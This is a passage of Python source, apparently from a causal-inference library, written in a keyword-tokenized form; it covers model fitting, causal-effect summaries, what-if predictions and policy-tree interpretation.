At least one feature index must be specified so that a model can be trained.")<block_end>heterogeneity_inds=self.heterogeneity_inds<if_stmt>heterogeneity_inds<is><none><block_start>heterogeneity_inds=[<none><for>ind train_inds]<block_end># if heterogeneity_inds is 1D, repeat it <if_stmt>heterogeneity_inds<eq>[]<or>isinstance(heterogeneity_inds[0] (int str bool))<block_start>heterogeneity_inds=[heterogeneity_inds<for>_ train_inds]<block_end># heterogeneity inds should be a 2D list of length same as train_inds <elif_stmt>heterogeneity_inds<is><not><none><and>len(heterogeneity_inds)<ne>len(train_inds)<block_start><raise>ValueError("Heterogeneity indexes should have the same number of entries, but here "<concat>f" there were {len(heterogeneity_inds)} heterogeneity entries but "<concat>f" {len(train_inds)} feature indices.")<block_end># replace None elements of heterogeneity_inds and ensure indices are numeric heterogeneity_inds={ind:list(range(X.shape[1]))<if>hinds<is><none><else>_get_column_indices(X hinds)<for>ind,hinds zip(train_inds heterogeneity_inds)}<if_stmt>warm_start<block_start>train_y_model=<false><if_stmt>self.nuisance_models<ne>self.nuisance_models_<block_start>warnings.warn("warm_start will be ignored since the nuisance models have changed "<concat>f"from {self.nuisance_models_} to {self.nuisance_models} since the previous call to fit")<line_sep>warm_start=<false><line_sep>train_y_model=<true><block_end><if_stmt>self.heterogeneity_model<ne>self.heterogeneity_model_<block_start>warnings.warn("warm_start will be ignored since the heterogeneity model has changed "<concat>f"from {self.heterogeneity_model_} to {self.heterogeneity_model} "<concat>"since the previous call to fit")<line_sep>warm_start=<false><block_end># TODO: bail out also if categorical columns, classification, random_state changed? <block_end><else_stmt><block_start>train_y_model=<true><block_end># TODO: should we also train a new model_y under any circumstances when warm_start is True? 
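# Editorial example (added for clarity; the column counts and index values below are assumed, not taken
# from the library): with X having four columns and heterogeneity_inds=None, the normalization above
# produces {ind: [0, 1, 2, 3] for ind in train_inds}, i.e. every column may drive heterogeneity for every
# treated feature; passing heterogeneity_inds=[[1], []] for two feature_inds instead yields
# {train_inds[0]: [1], train_inds[1]: []}, so the first feature uses only column 1 for heterogeneity and
# the second is fit with no heterogeneity features at all.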
<if_stmt>warm_start<block_start>new_inds=[ind<for>ind train_inds<if>(ind<not><in>self._cache<or>heterogeneity_inds[ind]<ne>self._cache[ind][1].hinds)]<block_end><else_stmt><block_start>new_inds=list(train_inds)<line_sep>self._cache={}# store mapping from feature to insights, results # train the Y model <if_stmt>train_y_model# perform model selection for the Y model using all X, not on a per-column basis <block_start>allX=ColumnTransformer([('encode' OneHotEncoder(drop='first' sparse=<false>) self.categorical)] remainder=StandardScaler()).fit_transform(X)<if_stmt>self.verbose<g>0<block_start>print("CausalAnalysis: performing model selection on overall Y model")<block_end><if_stmt>self.classification<block_start>self._model_y=_first_stage_clf(allX y automl=self.nuisance_models<eq>'automl' make_regressor=<true> random_state=self.random_state verbose=self.verbose)<block_end><else_stmt><block_start>self._model_y=_first_stage_reg(allX y automl=self.nuisance_models<eq>'automl' random_state=self.random_state verbose=self.verbose)<block_end><block_end><block_end><if_stmt>self.classification# now that we've trained the classifier and wrapped it, ensure that y is transformed to # work with the regression wrapper # we use column_or_1d to treat pd.Series and pd.DataFrame objects the same way as arrays <block_start>y=column_or_1d(y).reshape(-1 1)<line_sep># note that this needs to happen after wrapping to generalize to the multi-class case, # since otherwise we'll have too many columns to be able to train a classifier y=OneHotEncoder(drop='first' sparse=<false>).fit_transform(y)<block_end><assert_stmt>y.ndim<eq>1<or>y.shape[1]<eq>1 ("Multiclass classification isn't supported"<if>self.classification<else>"Only a single outcome is supported")<line_sep>self._vec_y=y.ndim<eq>1<line_sep>self._d_x=X.shape[1]<line_sep># start with empty results and default shared insights self._results=[]<line_sep>self._shared=_get_default_shared_insights_output()<line_sep>self._shared[_CausalInsightsConstants.InitArgsKey]={'feature_inds':_sanitize(self.feature_inds) 'categorical':_sanitize(self.categorical) 'heterogeneity_inds':_sanitize(self.heterogeneity_inds) 'feature_names':_sanitize(self.feature_names) 'classification':_sanitize(self.classification) 'upper_bound_on_cat_expansion':_sanitize(self.upper_bound_on_cat_expansion) 'nuisance_models':_sanitize(self.nuisance_models) 'heterogeneity_model':_sanitize(self.heterogeneity_model) 'categories':_sanitize(self.categories) 'n_jobs':_sanitize(self.n_jobs) 'verbose':_sanitize(self.verbose) 'random_state':_sanitize(self.random_state)}<line_sep># convert categorical indicators to numeric indices categorical_inds=_get_column_indices(X self.categorical)<line_sep>categories=self.categories<if_stmt>categories<eq>'auto'<block_start>categories=['auto'<for>_ categorical_inds]<block_end><else_stmt><block_start><assert_stmt>len(categories)<eq>len(categorical_inds) ("If categories is not 'auto', it must contain one entry per categorical column. 
Instead, categories"<concat>f" has length {len(categories)} while there are {len(categorical_inds)} categorical columns.")<block_end># check for indices over the categorical expansion bound invalid_inds=getattr(self 'untrained_feature_indices_' [])<line_sep># assume we'll be able to train former failures this time; we'll add them back if not invalid_inds=[(ind reason)<for>(ind reason) invalid_inds<if>ind<not><in>new_inds]<line_sep>self._has_column_names=<true><if_stmt>self.feature_names<is><none><block_start><if_stmt>hasattr(X "iloc")<block_start>feature_names=X.columns<block_end><else_stmt><block_start>self._has_column_names=<false><line_sep>feature_names=[f"x{i}"<for>i range(X.shape[1])]<block_end><block_end><else_stmt><block_start>feature_names=self.feature_names<block_end>self.feature_names_=feature_names<line_sep>min_counts={}<for_stmt>ind new_inds<block_start>column_text=self._format_col(ind)<if_stmt>ind<in>categorical_inds<block_start>cats,counts=np.unique(_safe_indexing(X ind axis=1) return_counts=<true>)<line_sep>min_ind=np.argmin(counts)<line_sep>n_cat=len(cats)<if_stmt>n_cat<g>self.upper_bound_on_cat_expansion<block_start>warnings.warn(f"{column_text} has more than {self.upper_bound_on_cat_expansion} "<concat>f"values (found {n_cat}) so no heterogeneity model will be fit for it; "<concat>"increase 'upper_bound_on_cat_expansion' to change this behavior.")<line_sep># can't remove in place while iterating over new_inds, so store in separate list invalid_inds.append((ind 'upper_bound_on_cat_expansion'))<block_end><elif_stmt>counts[min_ind]<l>_CAT_LIMIT<block_start><if_stmt>self.skip_cat_limit_checks<and>(counts[min_ind]<ge>5<or>(counts[min_ind]<ge>2<and>self.heterogeneity_model<ne>'forest'))# train the model, but warn <block_start>warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "<concat>f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}). "<concat>"A model will still be fit because 'skip_cat_limit_checks' is True, "<concat>"but this model may not be robust.")<line_sep>min_counts[ind]=counts[min_ind]<block_end><elif_stmt>counts[min_ind]<l>2<or>(counts[min_ind]<l>5<and>self.heterogeneity_model<eq>'forest')# no model can be trained in this case since we need more folds <block_start>warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "<concat>"the training dataset, but linear heterogeneity models need at least 2 and "<concat>"forest heterogeneity models need at least 5 instances, so no model will be fit "<concat>"for this column")<line_sep>invalid_inds.append((ind 'cat_limit'))<block_end><else_stmt># don't train a model, but suggest workaround since there are enough instances of least # populated class <block_start>warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "<concat>f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}), "<concat>"so no heterogeneity model will be fit for it. 
This check can be turned off by "<concat>"setting 'skip_cat_limit_checks' to True, but that may result in an inaccurate "<concat>"model for this feature.")<line_sep>invalid_inds.append((ind 'cat_limit'))<block_end><block_end><block_end><block_end><for_stmt>(ind _) invalid_inds<block_start>new_inds.remove(ind)<line_sep># also remove from train_inds so we don't try to access the result later train_inds.remove(ind)<if_stmt>len(train_inds)<eq>0<block_start><raise>ValueError("No features remain; increase the upper_bound_on_cat_expansion and ensure that there "<concat>"are several instances of each categorical value so that at least "<concat>"one feature model can be trained.")<block_end><block_end># extract subset of names matching new columns new_feat_names=_safe_indexing(feature_names new_inds)<line_sep>cache_updates=dict(zip(new_inds joblib.Parallel(n_jobs=self.n_jobs verbose=self.verbose)(joblib.delayed(_process_feature)(feat_name feat_ind self.verbose categorical_inds categories heterogeneity_inds min_counts y X self.nuisance_models self.heterogeneity_model self.random_state self._model_y self.cv self.mc_iters)<for>feat_name,feat_ind zip(new_feat_names new_inds))))<line_sep># track indices where an exception was thrown, since we can't remove from dictionary while iterating inds_to_remove=[]<for_stmt>ind,value cache_updates.items()<block_start><if_stmt>isinstance(value Exception)# don't want to cache this failed result <block_start>inds_to_remove.append(ind)<line_sep>train_inds.remove(ind)<line_sep>invalid_inds.append((ind value))<block_end><block_end><for_stmt>ind inds_to_remove<block_start><del_stmt>cache_updates[ind]<block_end>self._cache.update(cache_updates)<for_stmt>ind train_inds<block_start>dict_update,result=self._cache[ind]<line_sep>self._results.append(result)<for_stmt>k dict_update<block_start>self._shared[k]<augadd>dict_update[k]<block_end><block_end>invalid_inds.sort()<line_sep>self.untrained_feature_indices_=invalid_inds<line_sep>self.trained_feature_indices_=train_inds<line_sep>self.nuisance_models_=self.nuisance_models<line_sep>self.heterogeneity_model_=self.heterogeneity_model<line_sep><return>self<block_end><def_stmt>_format_col self ind<block_start><if_stmt>self._has_column_names<block_start><return>f"Column {ind} ({self.feature_names_[ind]})"<block_end><else_stmt><block_start><return>f"Column {ind}"<block_end><block_end># properties to return from effect InferenceResults @staticmethod<def_stmt>_point_props alpha<block_start><return>[(_CausalInsightsConstants.PointEstimateKey 'point_estimate') (_CausalInsightsConstants.StandardErrorKey 'stderr') (_CausalInsightsConstants.ZStatKey 'zstat') (_CausalInsightsConstants.PValueKey 'pvalue') (_CausalInsightsConstants.ConfidenceIntervalLowerKey <lambda>inf:inf.conf_int(alpha=alpha)[0]) (_CausalInsightsConstants.ConfidenceIntervalUpperKey <lambda>inf:inf.conf_int(alpha=alpha)[1])]<block_end># properties to return from PopulationSummaryResults @staticmethod<def_stmt>_summary_props alpha<block_start><return>[(_CausalInsightsConstants.PointEstimateKey 'mean_point') (_CausalInsightsConstants.StandardErrorKey 'stderr_mean') (_CausalInsightsConstants.ZStatKey 'zstat') (_CausalInsightsConstants.PValueKey 'pvalue') (_CausalInsightsConstants.ConfidenceIntervalLowerKey <lambda>inf:inf.conf_int_mean(alpha=alpha)[0]) (_CausalInsightsConstants.ConfidenceIntervalUpperKey <lambda>inf:inf.conf_int_mean(alpha=alpha)[1])]<block_end># Converts strings to property lookups or method calls as a convenience so that the # _point_props and _summary_props 
above can be applied to an inference object @staticmethod<def_stmt>_make_accessor attr<block_start><if_stmt>isinstance(attr str)<block_start>s=attr<def_stmt>attr o<block_start>val=getattr(o s)<if_stmt>callable(val)<block_start><return>val()<block_end><else_stmt><block_start><return>val<block_end><block_end><block_end><return>attr<block_end># Create a summary combining all results into a single output; this is used # by the various causal_effect and causal_effect_dict methods to generate either a dataframe # or a dictionary, respectively, based on the summary function passed into this method <def_stmt>_summarize self * summary get_inference props expand_arr drop_sample<block_start><assert_stmt>hasattr(self "_results") "This object has not been fit, so cannot get results"<line_sep># ensure array has shape (m,y,t) <def_stmt>ensure_proper_dims arr<block_start><if_stmt>expand_arr# population summary is missing sample dimension; add it for consistency <block_start>arr=np.expand_dims(arr 0)<block_end><if_stmt>self._vec_y# outcome dimension is missing; add it for consistency <block_start>arr=np.expand_dims(arr axis=1)<block_end><assert_stmt>2<le>arr.ndim<le>3<line_sep># add singleton treatment dimension if missing <return>arr<if>arr.ndim<eq>3<else>np.expand_dims(arr axis=2)<block_end># store set of inference results so we don't need to recompute per-attribute below in summary/coalesce infs=[get_inference(res)<for>res self._results]<line_sep># each attr has dimension (m,y) or (m,y,t) <def_stmt>coalesce attr<block_start>"""Join together the arrays for each feature"""<line_sep>attr=self._make_accessor(attr)<line_sep># concatenate along treatment dimension arr=np.concatenate([ensure_proper_dims(attr(inf))<for>inf infs] axis=2)<line_sep># for dictionary representation, want to remove unneeded sample dimension # in cohort and global results <if_stmt>drop_sample<block_start>arr=np.squeeze(arr 0)<block_end><return>arr<block_end><return>summary([(key coalesce(val))<for>key,val props])<block_end><def_stmt>_pandas_summary self get_inference * props n expand_arr=<false> keep_all_levels=<false><block_start>""" Summarizes results into a dataframe. 
Parameters ---------- get_inference : lambda Method to get the relevant inference results from each result object props : list of (string, string or lambda) Set of column names and ways to get the corresponding values from the inference object n : int The number of samples in the dataset expand_arr : boolean, default False Whether to add a synthetic sample dimension to the result arrays when performing internal computations keep_all_levels : boolean, default False Whether to keep all levels, even when they don't take on more than one value; Note that regardless of this argument the "sample" level will only be present if expand_arr is False """<def_stmt>make_dataframe props<block_start>to_include=OrderedDict([(key value.reshape(-1))<for>key,value props])<line_sep># TODO: enrich outcome logic for multi-class classification when that is supported index=pd.MultiIndex.from_tuples([(i outcome res.feature_name f"{lvl}v{res.feature_baseline}"<if>res.feature_baseline<is><not><none><else>lvl)<for>i range(n)<for>outcome ["y0"]<for>res self._results<for>lvl res.feature_levels] names=["sample" "outcome" "feature" "feature_value"])<if_stmt>expand_arr# There is no actual sample level in this data <block_start>index=index.droplevel("sample")<block_end><if_stmt><not>keep_all_levels<block_start><for_stmt>lvl index.levels<block_start><if_stmt>len(lvl)<eq>1<block_start><if_stmt><not>isinstance(index pd.MultiIndex)# can't drop only level <block_start>index=pd.Index([self._results[0].feature_name] name="feature")<block_end><else_stmt><block_start>index=index.droplevel(lvl.name)<block_end><block_end><block_end><block_end><return>pd.DataFrame(to_include index=index)<block_end><return>self._summarize(summary=make_dataframe get_inference=get_inference props=props expand_arr=expand_arr drop_sample=<false>)<block_end># dropping the sample dimension is handled above instead <def_stmt>_dict_summary self get_inference * n props kind drop_sample=<false> expand_arr=<false> row_wise=<false><block_start>""" Summarizes results into a dictionary. Parameters ---------- get_inference : lambda Method to get the relevant inference results from each result object n : int The number of samples in the dataset props : list of (string, string or lambda) Set of column names and ways to get the corresponding values from the inference object kind : string The kind of inference results to get (e.g. 'global', 'local', or 'cohort') drop_sample : boolean, default False Whether to drop the sample dimension from each array expand_arr : boolean, default False Whether to add an initial sample dimension to the result arrays row_wise : boolean, default False Whether to return a list of dictionaries (one dictionary per row) instead of a dictionary of lists (one list per column) """<def_stmt>make_dict props# should be serialization-ready and contain no numpy arrays <block_start>res=_get_default_specific_insights(kind)<line_sep>shared=self._shared<if_stmt>row_wise<block_start>row_data={}<line_sep># remove entries belonging to row data, since we're including them in the list of nested dictionaries <for_stmt>k _get_data_causal_insights_keys()<block_start><del_stmt>res[k]<block_end>shared=shared.copy()# copy so that we can modify without affecting shared state # TODO: Note that there's no column metadata for the sample number - should there be? 
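# Editorial sketch (the numeric values are assumed, not produced by the library): for n == 2 samples and a
# single numeric feature with one outcome, the row-wise representation assembled below ends up roughly as
#   res[_CausalInsightsConstants.RowData] == [{PointEstimateKey: 0.12, StandardErrorKey: 0.03, ...},
#                                             {PointEstimateKey: 0.41, StandardErrorKey: 0.05, ...}]
# i.e. one flat dictionary per flattened (sample, outcome, treatment level) entry, whereas the
# non-row-wise branch instead keeps one list per key.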
<for_stmt>k _get_column_causal_insights_keys()# need to replicate the column info for each sample, then remove from the shared data <block_start>row_data[k]=shared[k]<times>n<del_stmt>shared[k]<block_end># NOTE: the flattened order has the ouptut dimension before the feature dimension # which may need to be revisited once we support multiclass row_data.update([(key value.flatten())<for>key,value props])<line_sep># get the length of the list corresponding to the first dictionary key # `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into n_rows=len(row_data[list(row_data)[0]])<line_sep>res[_CausalInsightsConstants.RowData]=[{key:row_data[key][i]<for>key row_data}<for>i range(n_rows)]<block_end><else_stmt><block_start>res.update([(key value.tolist())<for>key,value props])<block_end><return>{**shared **res}<block_end><return>self._summarize(summary=make_dict get_inference=get_inference props=props expand_arr=expand_arr drop_sample=drop_sample)<block_end><def_stmt>global_causal_effect self * alpha=0.05 keep_all_levels=<false><block_start>""" Get the global causal effect for each feature as a pandas DataFrame. Parameters ---------- alpha : float, default 0.05 The confidence level of the confidence interval keep_all_levels : bool, default False Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level') even if there was only a single value for that level; by default single-valued levels are dropped. Returns ------- global_effects : pandas Dataframe DataFrame with the following structure: :Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper'] :Index: ['feature', 'feature_value'] :Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where 'num' is literally the string 'num' and feature_name is the input feature name. For each feature that is categorical, we have an entry with index ['{feature_name}', '{cat}v{base}'] where cat is the category value and base is the category used as baseline. If all features are numerical then the feature_value index is dropped in the dataframe, but not in the serialized dict. """<line_sep># a global inference indicates the effect of that one feature on the outcome <return>self._pandas_summary(<lambda>res:res.global_inference props=self._point_props(alpha) n=1 expand_arr=<true> keep_all_levels=keep_all_levels)<block_end><def_stmt>_global_causal_effect_dict self * alpha=0.05 row_wise=<false><block_start>""" Gets the global causal effect for each feature as dictionary. Dictionary entries for predictions, etc. 
will be nested lists of shape (d_y, sum(d_t)) Only for serialization purposes to upload to AzureML """<line_sep><return>self._dict_summary(<lambda>res:res.global_inference props=self._point_props(alpha) kind='global' n=1 row_wise=row_wise drop_sample=<true> expand_arr=<true>)<block_end><def_stmt>_cohort_effect_inference self Xtest<block_start><assert_stmt>np.ndim(Xtest)<eq>2<and>np.shape(Xtest)[1]<eq>self._d_x ("Shape of Xtest must be compatible with shape of X, "<concat>f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})")<def_stmt>inference_from_result result<block_start>est=result.estimator<line_sep>X=result.X_transformer.transform(Xtest)<if_stmt>X.shape[1]<eq>0<block_start>X=<none><block_end><return>est.const_marginal_ate_inference(X=X)<block_end><return>inference_from_result<block_end><def_stmt>cohort_causal_effect self Xtest * alpha=0.05 keep_all_levels=<false><block_start>""" Gets the average causal effects for a particular cohort defined by a population of X's. Parameters ---------- Xtest : array-like The cohort samples for which to return the average causal effects within cohort alpha : float, default 0.05 The confidence level of the confidence interval keep_all_levels : bool, default False Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level') even if there was only a single value for that level; by default single-valued levels are dropped. Returns ------- cohort_effects : pandas Dataframe DataFrame with the following structure: :Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper'] :Index: ['feature', 'feature_value'] :Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where 'num' is literally the string 'num' and feature_name is the input feature name. For each feature that is categorical, we have an entry with index ['{feature_name}', '{cat}v{base}'] where cat is the category value and base is the category used as baseline. If all features are numerical then the feature_value index is dropped in the dataframe, but not in the serialized dict. """<line_sep><return>self._pandas_summary(self._cohort_effect_inference(Xtest) props=self._summary_props(alpha) n=1 expand_arr=<true> keep_all_levels=keep_all_levels)<block_end><def_stmt>_cohort_causal_effect_dict self Xtest * alpha=0.05 row_wise=<false><block_start>""" Gets the cohort causal effects for each feature as dictionary. Dictionary entries for predictions, etc. 
will be nested lists of shape (d_y, sum(d_t)) Only for serialization purposes to upload to AzureML """<line_sep><return>self._dict_summary(self._cohort_effect_inference(Xtest) props=self._summary_props(alpha) kind='cohort' n=1 row_wise=row_wise expand_arr=<true> drop_sample=<true>)<block_end><def_stmt>_local_effect_inference self Xtest<block_start><assert_stmt>np.ndim(Xtest)<eq>2<and>np.shape(Xtest)[1]<eq>self._d_x ("Shape of Xtest must be compatible with shape of X, "<concat>f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})")<def_stmt>inference_from_result result<block_start>est=result.estimator<line_sep>X=result.X_transformer.transform(Xtest)<if_stmt>X.shape[1]<eq>0<block_start>X=<none><block_end>eff=est.const_marginal_effect_inference(X=X)<if_stmt>X<is><none># need to reshape the output to match the input <block_start>eff=eff._expand_outputs(Xtest.shape[0])<block_end><return>eff<block_end><return>inference_from_result<block_end><def_stmt>local_causal_effect self Xtest * alpha=0.05 keep_all_levels=<false><block_start>""" Gets the local causal effect for each feature as a pandas DataFrame. Parameters ---------- Xtest : array-like The samples for which to return the causal effects alpha : float, default 0.05 The confidence level of the confidence interval keep_all_levels : bool, default False Whether to keep all levels of the output dataframe ('sample', 'outcome', 'feature', and 'feature_level') even if there was only a single value for that level; by default single-valued levels are dropped. Returns ------- global_effect : pandas Dataframe DataFrame with the following structure: :Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper'] :Index: ['sample', 'feature', 'feature_value'] :Rows: For each feature that is numeric, we have an entry with index ['{sampleid}', '{feature_name}', 'num'], where 'num' is literally the string 'num' and feature_name is the input feature name and sampleid is the index of the sample in Xtest. For each feature that is categorical, we have an entry with index ['{sampleid', '{feature_name}', '{cat}v{base}'] where cat is the category value and base is the category used as baseline. If all features are numerical then the feature_value index is dropped in the dataframe, but not in the serialized dict. """<line_sep><return>self._pandas_summary(self._local_effect_inference(Xtest) props=self._point_props(alpha) n=Xtest.shape[0] keep_all_levels=keep_all_levels)<block_end><def_stmt>_local_causal_effect_dict self Xtest * alpha=0.05 row_wise=<false><block_start>""" Gets the local feature importance as dictionary Dictionary entries for predictions, etc. 
will be nested lists of shape (n_rows, d_y, sum(d_t)) Only for serialization purposes to upload to AzureML """<line_sep><return>self._dict_summary(self._local_effect_inference(Xtest) props=self._point_props(alpha) kind='local' n=Xtest.shape[0] row_wise=row_wise)<block_end><def_stmt>_safe_result_index self X feature_index<block_start><assert_stmt>hasattr(self "_results") "This instance has not yet been fitted"<assert_stmt>np.ndim(X)<eq>2<and>np.shape(X)[1]<eq>self._d_x ("Shape of X must be compatible with shape of the fitted X, "<concat>f"but got shape {np.shape(X)} instead of (n, {self._d_x})")<line_sep>(numeric_index )=_get_column_indices(X [feature_index])<line_sep>bad_inds=dict(self.untrained_feature_indices_)<if_stmt>numeric_index<in>bad_inds<block_start>error=bad_inds[numeric_index]<line_sep>col_text=self._format_col(numeric_index)<if_stmt>error<eq>'cat_limit'<block_start>msg=f"{col_text} had a value with fewer than {_CAT_LIMIT} occurrences, so no model was fit for it"<block_end><elif_stmt>error<eq>'upper_bound_on_cat_expansion'<block_start>msg=(f"{col_text} had more distinct values than the setting of 'upper_bound_on_cat_expansion', "<concat>"so no model was fit for it")<block_end><else_stmt><block_start>msg=(f"{col_text} generated the following error during fitting, "<concat>f"so no model was fit for it:\n{str(error)}")<block_end><raise>ValueError(msg)<block_end><if_stmt>numeric_index<not><in>self.trained_feature_indices_<block_start><raise>ValueError(f"{self._format_col(numeric_index)} was not passed as a feature index "<concat>"so no model was fit for it")<block_end>results=[res<for>res self._results<if>res.feature_index<eq>numeric_index]<assert_stmt>len(results)<eq>1<line_sep>(result )=results<line_sep><return>result<block_end><def_stmt>_whatif_inference self X Xnew feature_index y<block_start><assert_stmt><not>self.classification "What-if analysis cannot be applied to classification tasks"<assert_stmt>np.shape(X)[0]<eq>np.shape(Xnew)[0]<eq>np.shape(y)[0] ("X, Xnew, and y must have the same length, but have shapes "<concat>f"{np.shape(X)}, {np.shape(Xnew)}, and {np.shape(y)}")<assert_stmt>np.size(feature_index)<eq>1 f"Only one feature index may be changed, but got {np.size(feature_index)}"<line_sep>T0=_safe_indexing(X feature_index axis=1)<line_sep>T1=Xnew<line_sep>result=self._safe_result_index(X feature_index)<line_sep>X=result.X_transformer.transform(X)<if_stmt>X.shape[1]<eq>0<block_start>X=<none><block_end>inf=result.estimator.effect_inference(X=X T0=T0 T1=T1)<line_sep># we want to offset the inference object by the baseline estimate of y inf.translate(y)<line_sep><return>inf<block_end><def_stmt>whatif self X Xnew feature_index y * alpha=0.05<block_start>""" Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart. Note that this only applies to regression use cases; for classification what-if analysis is not supported. Parameters ---------- X: array-like Features Xnew: array-like New values of a single column of X feature_index: int or string The index of the feature being varied to Xnew, either as a numeric index or the string name if the input is a dataframe y: array-like Observed labels or outcome of a predictive model for baseline y values alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. 
Returns ------- y_new: DataFrame The predicted outputs that would have been observed under the counterfactual features """<line_sep><return>self._whatif_inference(X Xnew feature_index y).summary_frame(alpha=alpha)<block_end><def_stmt>_whatif_dict self X Xnew feature_index y * alpha=0.05 row_wise=<false><block_start>""" Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart. Note that this only applies to regression use cases; for classification what-if analysis is not supported. Parameters ---------- X: array-like Features Xnew: array-like New values of a single column of X feature_index: int or string The index of the feature being varied to Xnew, either as a numeric index or the string name if the input is a dataframe y: array-like Observed labels or outcome of a predictive model for baseline y values alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. row_wise : boolean, default False Whether to return a list of dictionaries (one dictionary per row) instead of a dictionary of lists (one list per column) Returns ------- dict : dict The counterfactual predictions, as a dictionary """<line_sep>inf=self._whatif_inference(X Xnew feature_index y)<line_sep>props=self._point_props(alpha=alpha)<line_sep>res=_get_default_specific_insights('whatif')<if_stmt>row_wise<block_start>row_data={}<line_sep># remove entries belonging to row data, since we're including them in the list of nested dictionaries <for_stmt>k _get_data_causal_insights_keys()<block_start><del_stmt>res[k]<block_end>row_data.update([(key self._make_accessor(attr)(inf).flatten())<for>key,attr props])<line_sep># get the length of the list corresponding to the first dictionary key # `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into n_rows=len(row_data[list(row_data)[0]])<line_sep>res[_CausalInsightsConstants.RowData]=[{key:row_data[key][i]<for>key row_data}<for>i range(n_rows)]<block_end><else_stmt><block_start>res.update([(key self._make_accessor(attr)(inf).tolist())<for>key,attr props])<block_end><return>res<block_end><def_stmt>_tree self is_policy Xtest feature_index * treatment_costs=0 max_depth=3 min_samples_leaf=2 min_impurity_decrease=1e-4 include_model_uncertainty=<false> alpha=0.05<block_start>result=self._safe_result_index(Xtest feature_index)<line_sep>Xtest=result.X_transformer.transform(Xtest)<if_stmt>Xtest.shape[1]<eq>0<block_start>Xtest=<none><block_end><if_stmt>result.feature_baseline<is><none><block_start>treatment_names=['decrease' 'increase']<block_end><else_stmt><block_start>treatment_names=[f"{result.feature_baseline}"]+[f"{lvl}"<for>lvl result.feature_levels]<block_end>TreeType=SingleTreePolicyInterpreter<if>is_policy<else>SingleTreeCateInterpreter<line_sep>intrp=TreeType(include_model_uncertainty=include_model_uncertainty uncertainty_level=alpha max_depth=max_depth min_samples_leaf=min_samples_leaf min_impurity_decrease=min_impurity_decrease random_state=self.random_state)<if_stmt>is_policy<block_start>intrp.interpret(result.estimator Xtest sample_treatment_costs=treatment_costs)<if_stmt>result.feature_baseline<is><none># continuous treatment, so apply a treatment level 10% of typical <block_start>treatment_level=result.treatment_value<times>0.1<line_sep># NOTE: this calculation is correct only if treatment costs are marginal costs, # because then scaling the difference between treatment value and treatment costs is the 
# same as scaling the treatment value and subtracting the scaled treatment cost. # # Note also that unlike the standard outputs of the SingleTreePolicyInterpreter, for # continuous treatments, the policy value should include the benefit of decreasing treatments # (rather than just not treating at all) # # We can get the total by seeing that if we restrict attention to units where we would treat, # 2 * policy_value - always_treat # includes exactly their contribution because policy_value and always_treat both include it # and likewise restricting attention to the units where we want to decrease treatment, # 2 * policy_value - always_treat # also computes the *benefit* of decreasing treatment, because their contribution to policy_value # is zero and the contribution to always_treat is negative treatment_total=(2<times>intrp.policy_value_-intrp.always_treat_value_.item())<times>treatment_level<line_sep>always_totals=intrp.always_treat_value_<times>treatment_level<block_end><else_stmt><block_start>treatment_total=intrp.policy_value_<line_sep>always_totals=intrp.always_treat_value_<block_end>policy_values=treatment_total always_totals<block_end><else_stmt># no policy values for CATE trees <block_start>intrp.interpret(result.estimator Xtest)<line_sep>policy_values=<none><block_end><return>intrp result.X_transformer.get_feature_names(self.feature_names_) treatment_names policy_values<block_end># TODO: it seems like it would be better to just return the tree itself rather than plot it; # however, the tree can't store the feature and treatment names we compute here... <def_stmt>plot_policy_tree self Xtest feature_index * treatment_costs=0 max_depth=3 min_samples_leaf=2 min_value_increase=1e-4 include_model_uncertainty=<false> alpha=0.05<block_start>""" Plot a recommended policy tree using matplotlib. Parameters ---------- Xtest : array-like Features feature_index Index of the feature to be considered as treatment treatment_costs: array-like, default 0 Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per unit of treatment; for discrete features, this is the difference in cost between each of the non-default values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1)) max_depth : int, default 3 maximum depth of the tree min_samples_leaf : int, default 2 minimum number of samples on each leaf min_value_increase : float, default 1e-4 The minimum increase in the policy value that a split needs to create to construct it include_model_uncertainty : bool, default False Whether to include confidence interval information when building a simplified model of the cate model. alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. """<line_sep>intrp,feature_names,treatment_names,_=self._tree(<true> Xtest feature_index treatment_costs=treatment_costs max_depth=max_depth min_samples_leaf=min_samples_leaf min_impurity_decrease=min_value_increase include_model_uncertainty=include_model_uncertainty alpha=alpha)<line_sep><return>intrp.plot(feature_names=feature_names treatment_names=treatment_names)<block_end><def_stmt>_policy_tree_output self Xtest feature_index * treatment_costs=0 max_depth=3 min_samples_leaf=2 min_value_increase=1e-4 alpha=0.05<block_start>""" Get a tuple of policy outputs. The first item in the tuple is the recommended policy tree expressed as a dictionary. 
